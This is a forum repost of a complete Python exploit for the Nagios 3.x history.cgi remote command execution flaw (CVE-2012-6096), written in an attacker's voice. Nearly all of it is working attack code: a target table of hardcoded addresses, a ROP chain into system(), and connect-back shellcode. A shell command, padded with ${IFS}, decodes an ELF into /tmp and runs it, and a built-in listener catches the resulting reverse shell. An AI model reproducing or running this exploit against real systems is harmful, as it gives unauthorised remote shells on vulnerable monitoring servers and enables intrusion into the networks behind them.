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Nagios 3.x Remote Command Execution



发表于 2015-9-8 09:49:04 | 显示全部楼层 |阅读模式


  1 #!/usr/bin/python
  2 #
  3 # CVE-2012-6096 - Nagios history.cgi Remote Command Execution
  4 # ===========================================================
  5 # Another year, another reincarnation of classic and trivial
  6 # bugs to exploit. This time we attack Nagios.. or more
  7 # specifically, one of its CGI scripts. [1]
  8 #
  9 # The Nagios code is an amazing monster. It reminds me a
10 # lot of some of my early experiments in C, back when I
11 # still had no clue what I was doing. (Ok, fair enough,
12 # I still don't, heheh.)
13 #
14 # Ok, I'll come clean. This exploit doesn't exactly
15 # defeat FORTIFY. This approach is likely to work just FINE
16 # on other crippled distro's though, think of stuff like
17 # ArchLinux, Slackware, and all those Gentoo kids twiddling
18 # their CFLAGS. [2] (Oh and hey, BSD and stuff!)
19 #
20 # I do some very stupid shit(tm) here that might make an
21 # exploit coder or two cringe. My sincere apologies for that.
22 #
23 # Cold beer goes out to my friends who are still practicing
24 # this dying but interesting type of art:
25 #
26 # * brainsmoke * masc * iZsh * skier_ * steve *
27 #
28 # -- blasty <blasty@fail0verflow.com> / 2013-01-08
29 #
30 # References:
31 # [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109
32 # [2] http://www.funroll-loops.info/
33 #
34 # P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!
35 # Next time you rebrand an exploit at least show some diligence and
36 # add some additional targets or improvements, so we can all profit!
37 #
38 # P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!
39 #
40 import os, sys, socket,struct, urllib, threading,SocketServer, time
41 from base64 import b64encode
42 SocketServer.TCPServer.allow_reuse_address =True
43 targets =[
44 {
45 "name":"Debian (nagios3_3.0.6-4~lenny2_i386.deb)",
46 "smash_len":0xc37,
47 "unescape":0x0804b620,
48 "popret":0x08048fe4,
49 "hostbuf":0x080727a0,
50 "system_plt":0x08048c7c
51 }
52 ]
53 def u32h(v):
54 returnstruct.pack("<L", v).encode('hex')
55 def u32(v, hex =False):
56 returnstruct.pack("<L", v)
57 # Tiny ELF stub based on:
58 # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
59 def make_elf(sc):
60 elf_head = \
61 "7f454c46010101000000000000000000"+ \
62 "02000300010000005480040834000000"+ \
63 "00000000000000003400200001000000"+ \
64 "00000000010000000000000000800408"+ \
65 "00800408"+ u32h(0x54+len(sc))*2+ \
66 "0500000000100000"
67 return elf_head.decode("hex")+ sc
68 # interactive connectback listener
69 class connectback_shell(SocketServer.BaseRequestHandler):
70 def handle(self):
71 print"\n[!!] K4P0W!@# -> shell from %s"%self.client_address[0]
72 print"[**] This shell is powered by insane amounts of illegal substances"
73 s =self.request
74 import termios, tty,select, os
75 old_settings = termios.tcgetattr(0)
76 try:
77 tty.setcbreak(0)
78 c =True
79 os.write(s.fileno(),"id\nuname -a\n")
80 while c:
81 for i inselect.select([0, s.fileno()],[],[],0)[0]:
82 c = os.read(i,1024)
83 if c:
84 if i ==0:
85 os.write(1, c)
86 os.write(s.fileno()if i ==0else1, c)
87 exceptKeyboardInterrupt:pass
88 finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
89 return
90 classThreadedTCPServer(SocketServer.ThreadingMixIn,SocketServer.TCPServer):
91 pass
92 if len(sys.argv)!=5:
93 print"\n >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>"
94 print" >> \"Jetzt geht's Nagi-los!\"\n"
95 print" usage: %s <base_uri> <myip> <myport> <target>\n"%(sys.argv[0])
96 print" targets:"
97 i =0
98 for target in targets:
99 print" %02d) %s"%(i, target['name'])
100 i = i+1
101 print""
102 sys.exit(-1)
103 target_no =int(sys.argv[4])
104 if target_no <0or target_no > len(targets):
105 print"Invalid target specified"
106 sys.exit(-1)
107 target = targets[int(sys.argv[4])]
108 # comment this shit if you want to setup your own listener
109 server =ThreadedTCPServer((sys.argv[2],int(sys.argv[3])), connectback_shell)
110 server_thread = threading.Thread(target=server.serve_forever)
111 server_thread.daemon =True
112 server_thread.start()
113 # shellcode to be executed
114 # vanilla x86/linux connectback written by a dutch gentleman
115 # close to a decade ago.
116 cback = \
117 "31c031db31c951b10651b10151b10251"+ \
118 "89e1b301b066cd8089c231c031c95151"+ \
119 "68badc0ded6668b0efb102665189e7b3"+ \
120 "1053575289e1b303b066cd8031c939c1"+ \
121 "740631c0b001cd8031c0b03f89d3cd80"+ \
122 "31c0b03f89d3b101cd8031c0b03f89d3"+ \
123 "b102cd8031c031d250686e2f7368682f"+ \
124 "2f626989e3505389e1b00bcd8031c0b0"+ \
125 "01cd80"
126 cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))
127 cback = cback.replace("b0ef",struct.pack(">H",int(sys.argv[3])).encode("hex"))
128 # Eww.. so there's some characters that dont survive the trip..
129 # yes, even with the unescape() call in our return-chain..
130 # initially I was going to use some /dev/tcp based connectback..
131 # but /dev/tcp isn't available/accesible everywhere, so instead
132 # we drop an ELF into /tmp and execute that. The '>' characters
133 # also doesn't survive the trip so we work around this by using
134 # the tee(1) utility.
135 # If your target has a /tmp that is mounted with noexec flag,
136 # is severely firewalled or guarded by trained (watch)dogs..
137 # you might want to reconsider this approach!
138 cmd = \
139 "rm -rf /tmp/x;"+ \
140 "echo "+ b64encode(make_elf(cback.decode('hex')))+"|"+ \
141 "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"
142 # Spaces (0x20) are also a problem, they always ends up as '+' :-(
143 # so apply some olde trick and rely on $IFS for argv separation
144 cmd = cmd.replace(" ","${IFS}")
145 # Basic return-2-whatever/ROP chain.
146 # We return into cgi_input_unescape() to get rid of
147 # URL escaping in a static buffer we control, and then
148 # we return into system@plt for the moneyshot.
149 #
150 # Ergo sum:
151 # There's no memoryleak or whatever needed to leak libc
152 # base and bypass ASLR.. This entire Nagios PoS is stringed
153 # together by system() calls, so pretty much every single one
154 # of their little silly binaries comes with a PLT entry for
155 # system(), huzzah!
156 rop =[
157 u32(target['unescape']),
158 u32(target['popret']),
159 u32(target['hostbuf']),
160 u32(target['system_plt']),
161 u32(0xdeafbabe),
162 u32(target['hostbuf'])
163 ]
164 # Yes.. urllib, so it supports HTTPS, basic-auth and whatnot
165 # out of the box. Building HTTP requests from scratch is so 90ies..
166 params= urllib.urlencode({
167 'host': cmd +"A"*(target['smash_len']-len(cmd))+"".join(rop)
168 })
169 print"[>>] CL1Q .."
170 f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s"%params)
171 print"[>>] CL4Q .."
172 f.read()
174 time.sleep(0x666)
175 server.shutdown()

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